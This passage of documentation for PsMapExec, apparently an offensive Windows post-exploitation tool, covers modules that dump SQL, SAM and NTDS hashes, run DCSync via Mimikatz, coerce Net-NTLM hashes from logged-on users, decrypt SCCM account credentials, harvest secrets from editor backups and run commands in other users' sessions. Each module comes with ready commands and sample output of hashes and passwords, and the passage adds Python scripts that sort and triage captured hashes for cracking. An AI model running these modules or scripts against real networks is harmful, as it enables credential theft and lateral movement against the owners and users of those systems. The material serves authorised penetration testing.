    full: 52a271886bf2a26764643c02aa939a9fd82de2a0763fd1339e987df72ca8b009d0d177e6095f75d2
    m/u : 52a271886bf2a26764643c02aa939a9fd82de2a0 / 763fd1339e987df72ca8b009d0d177e6095f75d2
old/Hex : 01 00 00 00 38 7f 34 6e fb 32 df d3 ba 41 46 89 89 ce 36 16 08 65 20 cc 63 5e 11 dd 43 93 10 ab 45 0b 4a 60 6d 52 1d 9b 26 06 67 cd
    full: 387f346efb32dfd3ba41468989ce3616086520cc635e11dd439310ab450b4a606d521d9b260667cd
    m/u : 387f346efb32dfd3ba41468989ce3616086520cc / 635e11dd439310ab450b4a606d521d9b260667cd

seCReT  : NL$KM
cur/Hex : eb dc cc 16 6c 51 90 4d 94 74 3b 1e 89 df e1 ad 88 20 f9 c5 83 34 d4 bb 93 98 41 b2 6e d2 83 2b 68 5b b7 e3 b8 0d d6 00 d4 75 6d 71 0a 87 a0 d0 83 80 f6 13 1a 26 a9 20 d9 f2 e6 26 7a 82 46 ff
old/Hex : eb dc cc 16 6c 51 90 4d 94 74 3b 1e 89 df e1 ad 88 20 f9 c5 83 34 d4 bb 93 98 41 b2 6e d2 83 2b 68 5b b7 e3 b8 0d d6 00 d4 75 6d 71 0a 87 a0 d0 83 80 f6 13 1a 26 a9 20 d9 f2 e6 26 7a 82 46 ff

> MDF

This module creates a Volume Shadow Copy of the running MSSQL database, allowing the master.mdf file to be safely copied even while in use. It then extracts the login password hashes found within the master database ready to be cracked with hashcat.

Based on Invoke-MDF, which is in turn based on the original work of XPN.

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module MDF -ShowOutput

Example Output

PsMapExec WinRM -Targets servers -Module mdf -ShowOutput

WinRM   172.16.109.187  sql03.final.com    Windows Server 2019 Standard   [+] SUCCESS
[+] Database successfully copied to: C:\Users\tina\AppData\Local\632364668.mdf

Name  : sa
Value : 0x020050B40C7843AC5C196F9375549D3566583A5C5D2E888353D0C3F9C973446A0

WinRM   172.16.109.188  sql11.final.com    Windows Server 2019 Standard   [+] SUCCESS
[+] Database successfully copied to: C:\Users\tina\AppData\Local\1390080740.mdf

Name  : sa
Value : 0x02003D821CF3B3D1DE294A3CFED043AD755B33D3258A39A706B3AA282F72A81D50

> Notepad

This module searches for stored data from the applications and locations listed in the table below:

Application Location
Notepad++ C:\Users\<UserProfile>\AppData\Roaming\Notepad++\backup\
Notepad (Windows 11/Server 2025) C:\Users\<UserProfile>\AppData\Local\Packages\Microsoft.WindowsNotepad_*\LocalState\TabState\
Visual Studio Code C:\Users\<UserProfile>\AppData\Roaming\Code\Backups
PowerShell_ISE C:\Users\<UserProfile>\AppData\Local\Microsoft_Corporation\powershell_ise*\

By default, Windows 11 and Windows Server 2025 store Notepad tab contents on disk as binary files. This module attempts to extract readable strings from these files.

Output for each system is stored in $pwd\PME\PME\Notepad\

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module Notepad -ShowOutput

Example Output

PS > PsMapExec wmi -Targets all -Module notepad -ShowOutput

WMI   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [*] NO RESULTS
WMI   10.10.10.4      WS-Applocker.security.local   Windows 11 Pro                    [+] SUCCESS
=========================================================================================
File Path: C:\Users\moe\AppData\Local\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\TabState\2d94e1de-9248-48e6-8ef4-63f9ec35c778.bin

Must change the domain admin password to something longer than 5 characters..
=========================================================================================

WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS
=========================================================================================
File Path: C:\Users\Administrator.SECURITY\AppData\Roaming\Notepad++\backup\new 1@2025-05-21_202358

SSH password for finance server:  P~@Sw0rd!)!
=========================================================================================
File Path: C:\Users\Administrator.SECURITY\AppData\Roaming\Notepad++\backup\new 2@2025-05-21_202414

[email protected]
[email protected]
[email protected]
[email protected]
=========================================================================================

WMI   10.10.10.17     MSSQL01.security.local        Windows Server 2022 Standard      [*] NO RESULTS
WMI   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [*] NO RESULTS

> NTDS

Executes Mimikatz's lsadump::dcsync on the target system and parses the NTDS output to replicate Secretsdump's format. No files are created on disk on the target system.

Output for each system is stored in $pwd\PME\DCSync\DCSync_Full_Dump

Note: see also the DCSync method, as the outcome is the same.

Optional Parameters

Parameter Value Description
-NoParse N/A Skips parsing and simply extracts the NTDS data in a hashcat-friendly format
-Rainbow N/A When provided, collected hashes will be compared against an online database (ntlm.pw)
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module NTDS -ShowOutput

Example Output

PS > PsMapExec wmi -Targets DC02 -Module NTDS -ShowOutput

WMI   10.10.10.111    DC02.security.local   Windows Server 2019 Standard   [+] SUCCESS

DC01$::aad3b435b51404eeaad3b435b51404ee:04b219f63c94d1405ce3d11b64dcafe3:::
krbtgt::aad3b435b51404eeaad3b435b51404ee:bca1f3ee9cb3b27da08a2d754fffff7d:::
Administrator::aad3b435b51404eeaad3b435b51404ee:602f5c34346bc946f9ac2c0922cd9ef6:::
SECURITY-CA$::aad3b435b51404eeaad3b435b51404ee:6e0028f4965e20e922fde677e40f9831:::
WS-APPLOCKER$::aad3b435b51404eeaad3b435b51404ee:8d827964afd7526ebd1c9fddbd85f899:::

<-- Snip -->

Parsing

PsMapExec parses the results from the NTDS dump and presents them in a digestible, structured format. Based on the findings, the parsed data will typically follow a layout similar to the example below:

C:\Users\moe\PME\DCSync\DCSync_Full_Dump
└── DC02.security.local-NTDS_Parsed_92853
    ├── Computer Data
    │   └── Computer-Hashes.txt
    ├── Full NTDS Dump
    │   └── DC02.security.local-NTDS.txt
    └── User Data
        ├── 1.All-User-Hashes.txt
        ├── 1.Enabled-User-Hashes.txt
        ├── 2.All-Users-With-Empty-Passwords.txt
        ├── 2.Enabled-Users-With-Empty-Passwords.txt
        ├── 3.All-Users-With-Password-As-Account-Name.txt
        ├── 3.Enabled-Users-With-Password-As-Account-Name.txt
        └── 4.Enabled-Users-With-Identical-Passwords.txt

Purpose of Parsing

The goal of parsing is twofold:

  1. Password cracking prep
    • Hashcat-ready files for cracking.
    • Split into a full NTDS dump plus separate user and computer hash lists.
  2. Client-facing findings, suitable for inclusion in reports or assessments:
    • Users with empty passwords (enabled and disabled).
    • Users with empty passwords (enabled only).
    • Users where the password matches the sAMAccountName (enabled and disabled).
    • Users where the password matches the sAMAccountName (enabled only).
    • Enabled users sharing identical passwords (password reuse across accounts).

> RDP

Enables or disables RDP on the remote system.

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results
-Option rdp:enable Enables RDP on the remote system
-Option rdp:disable Disables RDP on the remote system

Usage

# Enable RDP on remote systems
PsMapExec [Method] -Targets [Targets] -Module RDP -Option "RDP:Enable"

# Disable RDP on remote systems
PsMapExec [Method] -Targets [Targets] -Module RDP -Option "RDP:Disable"

Example Output

PS > PsMapExec wmi -Targets all -module rdp -Option rdp:disable

WMI   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
The operation completed successfully.

WMI   192.168.56.21   THE-EYRIE      SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
The operation completed successfully.

 

 

> NTLM

Note: Does not currently work against Windows Server 2008 / Windows 7 / Windows Server 2012.

This module builds upon the SessionExec module: execution on the remote host forces each user logon session to authenticate to a web server hosted locally on that system, which captures the user's NTLMv1 or NTLMv2 hash (Net-NTLM challenge-response).

This module's code is based on a fork of Get-NetNTLM.

If you wish to relay hashes, or capture them with Inveigh or Responder, use the SessionRelay module instead.

For example, given the quser output below, the remote host currently has the users standarduser and srv2019-admin in existing logon sessions. PsMapExec will attempt to obtain an NTLMv1 or NTLMv2 hash for each of them.

C:\Users\SRV2019-Admin>quser
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 standarduser                              1  Disc            7  04/08/2024 17:14
 srv2019-admin         console             2  Active      none   04/08/2024 17:18

Output for NTLM is stored in $PWD\PME\NTLM\.

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each targets output to the console
-SuccessOnly N/A Display only successful results

Usage

PsMapExec [Method] -Targets [Targets] -Module ntlm -ShowOutput

Example Output

PS > PsMapExec wmi -Targets all -Module ntlm -ShowOutput

WMI   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [*] NO RESULTS
WMI   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [*] NO RESULTS
WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS

[*] Invoking Command as [User:administrator] [Session ID:1]

Administrator::MSSQL02:46ED092BE14DE3FF00000000000000000000000000000000:151D5DA5BBF70C3D2A6F8A7C2C5473E736B3F0E9DA0F5B9A:1122334455667788

WMI   10.10.10.100    DC01.security.local           Windows Server 2022 Standard      [+] SUCCESS

[*] Invoking Command as [User:administrator] [Session ID:1]

Administrator::SECURITY:1122334455667788:CCD670E128260F9FE8F610915C24D211:0101000000000000272E21392DCADB0134E80284C92EBBD9000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000000000000030000013B772B7A0FA1926CDE3212F78A280C82E41321D016AD18D0B811E2169FA20450A001000000000000000000000000000000000000900300048005400540050002F0044004300300031002E00730065006300750072006900740079002E006C006F00630061006C000000000000000000

[*] Invoking Command as [User:moe] [Session ID:2]

Moe::SECURITY:1122334455667788:C0223697E5F206B9CBE817506D6EB194:0101000000000000439C823C2DCADB01EC3597FF5D556FE4000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000010000000020000013B772B7A0FA1926CDE3212F78A280C82E41321D016AD18D0B811E2169FA20450A001000000000000000000000000000000000000900300048005400540050002F0044004300300031002E00730065006300750072006900740079002E006C006F00630061006C000000000000000000

Parsing

This module's parsing output provides a high-level summary of which user hashes were captured on which systems, along with an indication of whether each hash is NTLMv1 or NTLMv2.

Example Output (Parsing)

Parsing Results

-[DC01.security.local-NTLM]-

Obtained NTLMv2 hash for Administrator
Obtained NTLMv2 hash for Moe

-[MSSQL02.security.local-NTLM]-

Obtained NTLMv1 hash for Administrator

[*] Outputting all NTLMv2 results to C:\Users\moe\PME\NTLM\All-NTLMv2.txt
[*] Outputting all NTLMv1 results to C:\Users\moe\PME\NTLM\All-NTLMv1.txt
[!] You can check to see if the NTLMv1 password is known against https://shuck.sh/get-shucking.php
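The NTLMv1/NTLMv2 split that the parsing step performs comes down to the field layout of each captured line. The following is an added example (Python, not PsMapExec's code) that sorts captured lines the same way, reports the hashcat mode for each, and flags two things a practitioner checks before cracking: whether the server challenge is the static 1122334455667788 value (which is what makes the shuck.sh lookup mentioned above possible for NTLMv1), and whether an NTLMv1 response used Extended Session Security. The NTLMv1 sample is the line shown in the output above; the NTLMv2 sample reuses that output's user, challenge and NTProofStr with a shortened, made-up blob. The console line in the sample is there to show that non-hash lines are ignored.

```python
"""Sort captured Net-NTLM responses into NTLMv1 and NTLMv2 buckets (the All-NTLMv1.txt /
All-NTLMv2.txt split) and annotate them for cracking. Added example, not PsMapExec code."""
import re

HEX = r"[0-9A-Fa-f]"
# user::domain:LM response (48 hex):NT response (48 hex):server challenge (16 hex)
NTLMV1_RE = re.compile(rf"^[^:]+::[^:]*:{HEX}{{48}}:{HEX}{{48}}:{HEX}{{16}}$")
# user::domain:server challenge (16 hex):NTProofStr (32 hex):blob (hex, variable length)
NTLMV2_RE = re.compile(rf"^[^:]+::[^:]*:{HEX}{{16}}:{HEX}{{32}}:{HEX}+$")
STATIC_CHALLENGE = "1122334455667788"          # fixed challenge used by the local capture server
HASHCAT_MODE = {"NTLMv1": 5500, "NTLMv2": 5600}


def classify(line: str):
    """Describe one captured line, or return None for anything that is not a Net-NTLM response."""
    line = line.strip()
    if NTLMV1_RE.match(line):
        user, _, domain, lm_resp, _nt_resp, chal = line.split(":")
        kind = "NTLMv1"
        # With Extended Session Security the LM field is an 8-byte client nonce followed by
        # 16 zero bytes, and the effective challenge becomes MD5(server challenge || nonce)[:8].
        ess = lm_resp[16:] == "0" * 32
    elif NTLMV2_RE.match(line):
        user, _, domain, chal, _proof, _blob = line.split(":")
        kind, ess = "NTLMv2", False
    else:
        return None
    return {"type": kind, "user": user, "domain": domain, "challenge": chal.lower(),
            "ess": ess, "static_challenge": chal.lower() == STATIC_CHALLENGE,
            "hashcat_mode": HASHCAT_MODE[kind], "line": line}


def sort_captures(lines):
    """Bucket lines by Net-NTLM version, dropping console noise."""
    out = {"NTLMv1": [], "NTLMv2": []}
    for line in lines:
        rec = classify(line)
        if rec:
            out[rec["type"]].append(rec)
    return out


def summary(lines):
    """One line per capture, in the spirit of the module's 'Obtained NTLMv2 hash for X' output."""
    rows = []
    for kind, recs in sort_captures(lines).items():
        for r in recs:
            note = ""
            if kind == "NTLMv1" and r["static_challenge"]:
                # NTLMv1 under a known challenge can be looked up rather than cracked
                note = " (static challenge: try a lookup before cracking)"
            rows.append(f"Obtained {kind} hash for {r['user']} [hashcat -m {r['hashcat_mode']}]{note}")
    return rows


# Sample input: one console line, the NTLMv1 line from this page, and a constructed NTLMv2 line.
SAMPLE = [
    "[*] Invoking Command as [User:administrator] [Session ID:1]",
    "Administrator::MSSQL02:46ED092BE14DE3FF00000000000000000000000000000000:"
    "151D5DA5BBF70C3D2A6F8A7C2C5473E736B3F0E9DA0F5B9A:1122334455667788",
    "Moe::SECURITY:1122334455667788:c0223697e5f206b9cbe817506d6eb194:"
    "0101000000000000439c823c2dcadb01ec3597ff5d556fe4000000000200060053004d00420000000000",
]

if __name__ == "__main__":
    for row in summary(SAMPLE):
        print(row)
```

Note that a static challenge only helps for NTLMv1: an NTLMv2 response still includes a client nonce inside the blob, so it must be cracked with hashcat mode 5600 regardless of the challenge value.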

 

 

> SAM

Dumps SAM credentials from each target system using a heavily modified version of Invoke-NTLMExtract.ps1.

For each system output is stored in $PWD\PME\SAM\.

Optional Parameters

Parameter Value Description
-NoParse N/A Omits parsing of each system's output, including the check for SAM hashes that are valid on multiple systems
-Rainbow N/A When provided, collected SAM hashes are looked up against an online database (ntlm.pw). This sends the hashes to a third-party service, so check the engagement's rules before using it
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module SAM -ShowOutput

Example Output

PS > PsMapExec winrm -Targets all -Module sam -ShowOutput

WinRM   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

WinRM   10.10.10.17     MSSQL01.security.local        Windows Server 2022 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::

WinRM   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

WinRM   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::

Parsing

PsMapExec parses the results from each system and presents them in a readable, digestible format. It identifies local accounts whose NT hash is identical across systems (the same local password reused on several hosts, so the hash can be passed to each of them) and outputs all collected hashes in a hashcat-compatible format.

Each hash is prefixed with the system name it was extracted from, making identification easier without compromising hashcat compatibility (run hashcat with --username so the prefix and account name are treated as the user field).

Example Output (Parsing)

------------------------- Hashes which are valid on multiple computers -------------------------

Computers: MSSQL01, MSSQL02
MSSQL_Admin:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::

Computers: MSSQL01, MSSQL02, Security-CA, SRV2012
Administrator:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

Computers: DC01, DC02
Administrator:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

------------------------------ All collected SAM Hashes ----------------------------------------

[DC01]Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[DC02]Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[MSSQL01]Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[MSSQL01]MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::
[MSSQL02]Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[MSSQL02]MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::
[Security-CA]Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[SRV2012]Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

------------------------------------------------------------------------------------------------
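The checks behind both parsing steps, the NTDS "Purpose of Parsing" findings above (empty passwords, password equal to the account name, identical passwords across accounts) and the SAM "valid on multiple computers" grouping, are simple to reproduce offline. The following is an added example (Python, not PsMapExec's code) that reads pwdump-style lines in either form, with or without the [HOST] prefix, and produces those findings. It computes the NT hash locally (MD4 over UTF-16LE, with a compact MD4 since hashlib's is often disabled under OpenSSL 3) so the password-equals-name check needs no wordlist. The enabled/disabled split is not attempted because account status is not present in these lines. The SAM sample reuses the values printed above; the NTDS sample lines are constructed.

```python
"""Offline triage of pwdump-style NT hash lines, in the spirit of PsMapExec's NTDS and SAM
parsing. Added example, not PsMapExec code. Accepts NTDS lines (user:rid:lmhash:nthash:::)
and SAM-parsing lines with a host prefix ([HOST]user:rid:lmhash:nthash:::)."""
import struct
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password


def md4(data: bytes) -> bytes:
    """Compact MD4 (RFC 1320); hashlib's md4 is frequently unavailable under OpenSSL 3."""
    mask = 0xFFFFFFFF
    rl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, k in rounds:
            for i, j in enumerate(order):
                a = rl((a + fn(b, c, d) + X[j] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c      # rotate so the next step updates the next register
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(lines):
    """Yield (host, user, rid, nthash); host is None for plain NTDS lines."""
    for line in lines:
        line = line.strip()
        if line.count(":") < 4:
            continue
        host = None
        if line.startswith("[") and "]" in line:
            host, line = line[1:].split("]", 1)
        user, rid, _lm, nt = line.split(":")[:4]
        yield host, user.split("\\")[-1], rid, nt.lower()   # drop any DOMAIN\ prefix


def triage(lines):
    findings = {"empty": [], "password_is_name": [], "reused": {}, "multi_host": {}}
    users_by_hash = defaultdict(set)
    hosts_by_user_hash = defaultdict(set)
    for host, user, _rid, nt in parse_pwdump(lines):
        label = f"[{host}]{user}" if host else user
        if nt == EMPTY_NT:
            findings["empty"].append(label)
        name = user.rstrip("$")   # machine accounts: compare against the name without the '$'
        if nt in (nt_hash(name), nt_hash(name.lower())):
            findings["password_is_name"].append(label)
        users_by_hash[nt].add(user)
        if host:
            hosts_by_user_hash[(user, nt)].add(host)
    # identical passwords across different accounts (NTDS finding 4); empty password excluded
    findings["reused"] = {h: sorted(u) for h, u in users_by_hash.items() if len(u) > 1 and h != EMPTY_NT}
    # same local account with the same hash on several computers (SAM "valid on multiple computers")
    findings["multi_host"] = {k: sorted(v) for k, v in hosts_by_user_hash.items() if len(v) > 1}
    return findings


# Constructed sample input. SAM lines reuse the values shown on this page; NTDS lines are made up.
SAM_SAMPLE = """
[DC01]Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[DC02]Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[MSSQL01]Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[MSSQL01]MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::
[MSSQL02]Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[MSSQL02]MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::
""".strip().splitlines()

NTDS_SAMPLE = [
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",      # empty
    f"svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:{nt_hash('svc_backup')}:::",         # password == name
    "alice:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",      # 'password'
    "bob:1106:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",        # 'password'
]

if __name__ == "__main__":
    for name, sample in (("SAM", SAM_SAMPLE), ("NTDS", NTDS_SAMPLE)):
        print(name, triage(sample))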

 

 

> SCCM

Dumps the local SCCM client's secrets: Network Access Account (NAA) credentials and task sequence data, both held on the client as DPAPI-protected blobs. Collected information is automatically parsed and stored in $PWD\PME\SCCM\.

Note that a client can retain credentials for NAAs that have since been rotated (the example below recovers two accounts from a single client), so every account recovered is worth validating even if it looks retired. Task sequence XML frequently embeds credentials in command lines, as the example also shows.

Optional Parameters

Parameter Value Description
-NoParse N/A Will omit parsing output from each system.
-ShowOutput N/A Displays each target's output to the console.
-SuccessOnly N/A Display only successful results.

Usage

PsMapExec [Method] -Targets [Targets] -Module sccm -ShowOutput

Example Output

PS > PsMapExec WinRM -Targets sccm-distro -Module sccm -ShowOutput

WinRM   10.2.10.12      sccm-distro.ludus.domain   Windows Server 2022 Standard Evaluation   [+] SUCCESS

< -- Snip -- >

[+] Found 2 Network Access Account(s)
[+] Decrypting network access account credentials

    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 266
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :
    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 250
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :


    Network Access Username: ludus\sccm_naa_2
    Network Access Password: password123


    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 250
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :
    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 250
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :


    Network Access Username: ludus\sccm_naa
    Network Access Password: Password123


[+] Found 2 Task Sequence(s)
[+] Decrypting Task Sequences

    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 8042
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :


[+]    Task Sequence:


<sequence version="3.10">
  <step type="SMS_TaskSequence_RunPowerShellScriptAction" name="Run PowerShell Script" description=""
runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">
    <action>OSDRunPowerShellScript.exe</action>
    <defaultVarList>
      <variable name="OSDRunPowerShellScriptExecutionPolicy" property="ExecutionPolicy">AllSigned</variable>
      <variable name="OSDRunPowerShellScriptOutputVariableName" property="OutputVariableName">
      </variable>
      <variable name="OSDRunPowerShellScriptParameters" property="Parameters">
      </variable>
      <variable name="_SMSTSRunPowerShellAsUser" property="RunAsUser">false</variable>
      <variable name="OSDRunPowerShellScriptSourceScript" property="SourceScript">//4kA <--Snip --> </variable>
      <variable name="OSDRunPowerShellScriptSuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
      <variable name="SMSTSRunPowerShellUserName" property="UserName">
      </variable>
      <variable name="SMSTSRunPowerShellWorkingDirectory" property="WorkingDirectory">
      </variable>
    </defaultVarList>
  </step>
  <step type="SMS_TaskSequence_RunCommandLineAction" name="Map Second Network Drive" description=""
runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">
    <action>smsswd.exe /run: powershell.exe /c net use Z: \\fileserver\adminshare /user:DOMAIN\saccount
Str0ngPASSW0rd___{{"}}</action>
    <defaultVarList>
      <variable name="CommandLine" property="CommandLine" hidden="true">powershell.exe /c net use Z:
\\fileserver\adminshare /user:DOMAIN\saccount Str0ngPASSW0rd___{{"}}</variable>
      <variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>
      <variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">
      </variable>
      <variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>
      <variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
    </defaultVarList>
  </step>
  <step type="SMS_TaskSequence_RunCommandLineAction" name="Map network drive" description="" runIn="WinPEandFullOS"
successCodeList="0 3010" retryCount="0" runFromNet="false">
    <action>smsswd.exe /run: cmd.exe /c net use Z: \\fileserver\adminshare /user:DOMAIN\saccount P@ssw0rd123!</action>
    <defaultVarList>
      <variable name="CommandLine" property="CommandLine" hidden="true">cmd.exe /c net use Z: \\fileserver\adminshare
/user:DOMAIN\saccount P@ssw0rd123!</variable>
      <variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>
      <variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">
      </variable>
      <variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>
      <variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
    </defaultVarList>
  </step>
</sequence>


< -- Snip -->

Parsing

PsMapExec will attempt to automatically parse extracted data to give an overview of interesting snippets.

Example Output (Parsing)

Parsing Results

-[sccm-distro.ludus.domain]-

Task Sequences
Directory Path  : C:\Users\domainadmin\PME\SCCM\sccm-distro.ludus.domain
Task Sequences  : Found 2 Task Sequences and saved to XML
Possible Creds  : TaskSequence_0.xml, TaskSequence_1.xml <--- check for creds!

Network Access Accounts
NAA File Path   : C:\Users\domainadmin\PME\SCCM\sccm-distro.ludus.domain\NAA-Credentials.txt
NAA Credentials : ludus\sccm_naa:Password123
NAA Credentials : ludus\sccm_naa_2:password123

 

 

> SessionExec

The SessionExec module is based on Leo4j's SessionExec and uses its PowerShell port, Invoke-SessionExec.

This module connects to the target system, elevates to SYSTEM and runs the specified -Command as each user that has a logon session on that system.

For example, given the quser output below, the remote host currently has the users standarduser and srv2019-admin in existing logon sessions. PsMapExec will execute the given command within each user's context.

C:\Users\SRV2019-Admin>quser
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 standarduser                              1  Disc            7  04/08/2024 17:14
 srv2019-admin         console             2  Active      none   04/08/2024 17:18

Output for SessionExec is stored under $PWD\PME\.

Optional Parameters

Parameter Value Description
-Command Command The command to run as each user. If not specified, a simple "whoami" will be executed.
-ShowOutput N/A Displays each target's output to the console.
-SuccessOnly N/A Display only successful results.

Usage

PsMapExec [Method] -Targets [Targets] -Module SessionExec -ShowOutput

Example Output

PS > PsMapExec winrm -Targets all -Module SessionExec -ShowOutput

WinRM   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.17     MSSQL01.security.local        Windows Server 2022 Standard      [*] NO RESULTS
WinRM   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS

